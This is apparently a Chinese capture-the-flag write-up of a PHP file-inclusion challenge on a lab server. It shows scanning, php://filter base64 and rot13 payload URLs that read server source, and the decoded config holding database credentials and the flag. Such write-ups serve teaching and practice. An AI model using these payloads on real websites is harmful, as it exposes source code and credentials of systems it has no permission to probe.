CTF---Web---文件包含---05---base64+路径

---

前言

题目分类：

CTF—Web—文件包含—05—base64+路径

---

一、题目描述

题目： 172.16.15.186/stage/8/

文件包含

二、解题步骤

1、御剑扫描

Step1：御剑扫描，得到robots.txt文件，既而得到ge_t_key.php

2、查看源码

直接去访问172.16.15.186/stage/8/ge_t_key.php，发现内容为空，因为源码中没有echo输出，这时候立马想到使用filter协议进行读取源代码：
php://filter/read=convert.base64-encode/resource= ge_t_key.php

但是直接读取，http://172.16.15.186/stage/8/?php://filter/read=convert.base64-encode/resource=ge_t_key.php，发现失败，并不可以，

查看源代码，得到?m=&c=show&p=views&a=contact，参数a可变，其他不变

3、判断后缀

由此可访问http://172.16.15.186/stage/8/?m=&c=show&p=views&a=php://filter/read=convert.base64-encode/resource=ge_t_key.php，

页面回显为主页面，抓包，可知，程序在ge_t_key.php给我们自动加上.php后缀，所以将此链接中的.php去掉即可。

访问http://172.16.15.186/stage/8/?m=&c=show&p=views&a=php://filter/read=convert.base64-encode/resource=ge_t_key，还是报错。

4、路径构造

认真发现上下的url可以发现：其实，还有一个路径的问题

这里还会给我们自动加上路径views，但是根据robots.txt的提示，我们知道key文件在根目录下，并不在views里面，但是…/被过滤，无法跳级，那怎么办？其实直接把路径views删掉就可以了：

http://172.16.15.186/stage/8/?m=&c=show&p=&a=php://filter/read=convert.base64-encode/resource=ge_t_key

5、base64解码

得到base64编码，解码得到key{9105d2d148081731}

PD9waHANCiRjb25maWcgPSBhcnJheSgNCiAgICdob3N0JyA9Pidsb2NhbGhvc3QnLA0KICAgJ3VzZXInID0+J3Jvb3QnLA0KICAgJ3Bhc3MnID0+J3Jvb3QnLA0KICAgJ2NoYXJzZXQnID0+J3V0ZjgnLA0KICAgJ2RibmFtZScgPT4gJ2luY2x1ZGUnLA0KICAgJ0tleSc9Pic5MTA1ZDJkMTQ4MDgxNzMxJw0KCSk7

Base64解码为：

$config = array(
   'host' =>'localhost',
   'user' =>'root',
   'pass' =>'root',
   'charset' =>'utf8',
   'dbname' => 'include',
   'Key'=>'9105d2d148081731'
	);

---

三、总结

文件包含漏洞识别：

1、访问页面内容为空 —> 使用filter协议进行读取源代码(因为源码中没有echo输出）

2、访问不同页面时，get传参跳转

文件包含做题要点：

1、伪协议的选择(base64、rot13)

php://filter/read=string.rot13/resource

php://filter/read=convert.base64-encode/resource

2、确认读取路径

当无其他问题，但还是读不出页面时，可考虑路径问题